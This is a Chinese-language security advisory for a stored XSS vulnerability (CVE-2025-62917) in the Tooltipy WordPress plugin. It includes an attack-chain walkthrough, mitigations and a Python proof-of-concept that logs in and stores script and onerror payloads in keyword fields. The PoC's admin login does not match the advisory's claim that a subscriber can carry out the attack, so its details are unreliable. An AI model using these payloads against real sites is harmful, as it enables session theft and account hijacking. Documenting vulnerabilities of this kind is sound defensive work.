CVE-2025-62917 Tooltipy WordPress插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62917

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Tooltipy (bluet-keywords-tooltip-generator) WordPress插件

漏洞概述

CVE-2025-62917是WordPress插件Tooltipy（bluet-keywords-tooltip-generator）中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于5.5.9及之前的所有版本中，源于插件在处理用户输入时未能正确对输入内容进行安全过滤和转义。Tooltipy插件主要用于在WordPress网站中创建和管理工具提示（Tooltip）功能，允许网站管理员通过关键词匹配自动为文章中的特定词汇添加悬浮提示框。然而，由于该插件在保存关键词配置时未对用户提交的JavaScript代码进行充分的输入验证，攻击者可以在关键词字段中注入恶意脚本代码。这些恶意代码会被永久存储在WordPress数据库中，当其他用户访问包含该关键词的页面时，浏览器会执行注入的恶意脚本。攻击者可利用此漏洞窃取受害者的会话Cookie、劫持用户账户、进行钓鱼攻击或在网站上注入恶意内容，对网站访问者和网站本身造成安全威胁。由于该漏洞影响所有访问包含恶意关键词页面的用户，因此具有广泛的攻击面和较高的危害性。

技术细节

该存储型XSS漏洞的根本原因在于Tooltipy插件在处理关键词输入时缺乏适当的输入验证和输出编码。插件的关键词管理功能允许管理员配置关键词及其对应的工具提示内容，但未对输入内容进行HTML标签过滤或JavaScript代码转义。攻击者可以在关键词名称或描述字段中插入包含<script>标签或事件处理器（如onerror、onload等）的恶意代码。当其他用户访问包含该关键词的文章时，插件会从数据库中读取关键词数据并将其渲染到页面中。由于恶意代码未经转义直接输出，浏览器会将其作为合法脚本执行。攻击者可以利用此漏洞执行任意JavaScript代码，包括窃取用户Cookie中的会话令牌、修改页面内容进行钓鱼、诱导用户进行非预期操作等。由于攻击代码存储在数据库中，攻击具有持久性，管理员如果不及时发现并清理恶意数据，攻击将持续有效。修复此漏洞需要在输入阶段对所有用户提交的内容进行严格的输入验证，并在输出阶段对动态内容进行HTML实体编码或使用安全的输出函数。

攻击链分析

STEP 1

步骤1

攻击者以低权限用户（如订阅者）身份登录WordPress网站

STEP 2

步骤2

攻击者访问Tooltipy插件的关键词管理页面

STEP 3

步骤3

攻击者在关键词名称或描述字段中注入恶意JavaScript代码（如<img src=x onerror=alert(1)>）

STEP 4

步骤4

恶意代码被保存到WordPress数据库中，由于缺乏输入验证，脚本内容未经转义

STEP 5

步骤5

当其他用户访问包含该关键词的文章页面时，插件从数据库读取并渲染关键词

STEP 6

步骤6

浏览器将恶意代码作为合法脚本执行，攻击者成功窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-62917 PoC - Tooltipy Plugin Stored XSS
# Target: WordPress site with Tooltipy plugin <= 5.5.9

def exploit_stored_xss(target_url, username, password, xss_payload):
    """
    Exploit stored XSS in Tooltipy plugin
    xss_payload: Malicious JavaScript code to be stored
    """
    session = requests.Session()
    
    # Step 1: Login to WordPress admin
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    login_response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Add malicious keyword with XSS payload
    admin_url = f"{target_url}/wp-admin/admin.php?page=tooltipy-keywords"
    
    keyword_data = {
        'keyword': xss_payload,
        'description': '<script>alert(document.cookie)</script>',
        'tip_title': 'Malicious Tip',
        'tip_content': 'Compromised content',
        'submit': 'Add Keyword'
    }
    
    add_response = session.post(admin_url, data=keyword_data)
    
    if add_response.status_code == 200:
        print(f"[+] XSS payload injected: {xss_payload}")
        print("[+] Payload will execute when any user visits page with this keyword")
        return True
    else:
        print("[-] Failed to inject payload")
        return False

# Example usage
if __name__ == "__main__":
    target = "http://target-site.com"
    xss = "<img src=x onerror=alert(document.domain)>"
    exploit_stored_xss(target, "admin", "password", xss)

影响范围

Tooltipy <= 5.5.9

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 临时禁用Tooltipy插件或限制其功能；2) 对所有用户角色禁用关键词添加/编辑功能，仅保留管理员权限；3) 在Web服务器层面配置严格的Content-Security-Policy响应头，阻止内联脚本执行；4) 使用WordPress安全插件（如Wordfence、Sucuri）实时监控和阻止可疑请求；5) 定期检查wp_options和自定义数据库表中是否存在异常关键词数据；6) 强制所有用户使用强密码并启用双因素认证以降低账户被盗风险。